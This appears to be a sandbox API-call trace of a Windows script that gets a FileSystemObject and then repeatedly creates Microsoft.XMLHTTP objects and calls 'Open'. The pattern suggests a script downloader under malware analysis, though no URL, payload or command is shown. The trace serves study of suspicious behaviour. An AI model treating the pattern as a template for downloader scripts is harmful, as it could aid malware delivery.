	[0455.793] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0455.793] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0455.793] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0456.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0456.514] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0456.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0456.515] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.515] SysStringLen (param_1=0x0) returned 0x0
	[0456.515] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.515] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0456.515] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0456.515] ??2@YAPEAX_K@Z () returned 0x62f330
	[0456.516] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0456.516] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.516] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0456.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0456.516] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0456.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.516] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.519] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.519] SysStringLen (param_1=0x0) returned 0x0
	[0456.519] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.519] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0456.519] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0456.519] ??2@YAPEAX_K@Z () returned 0x62f310
	[0456.519] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f310) 
	[0456.519] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.519] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0456.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0456.519] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0456.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.519] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.520] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.520] SysStringLen (param_1=0x0) returned 0x0
	[0456.520] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.520] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0456.520] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0456.520] ??2@YAPEAX_K@Z () returned 0x62f330
	[0456.520] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.520] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0456.520] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0456.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.521] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.521] SysStringLen (param_1=0x0) returned 0x0
	[0456.521] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.521] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7250) returned 0x0
	[0456.521] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0456.521] ??2@YAPEAX_K@Z () returned 0x62f310
	[0456.521] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f310) 
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.521] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7250) returned 0x0
	[0456.521] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7250) returned 0x3
	[0456.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.522] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7250, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.522] longjmp () 
	[0456.522] longjmp () 
	[0456.522] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.522] SysStringLen (param_1=0x0) returned 0x0
	[0456.522] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.522] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0456.522] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0456.522] ??2@YAPEAX_K@Z () returned 0x62f330
	[0456.522] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0456.522] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.522] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0456.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0456.522] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.523] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.523] longjmp () 
	[0456.523] longjmp () 
	[0456.523] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0456.523] SysStringLen (param_1=0x0) returned 0x0
	[0456.523] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0456.523] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0456.523] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0456.523] ??2@YAPEAX_K@Z () returned 0x62f310
	[0456.523] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0456.523] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0456.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0456.524] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0456.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
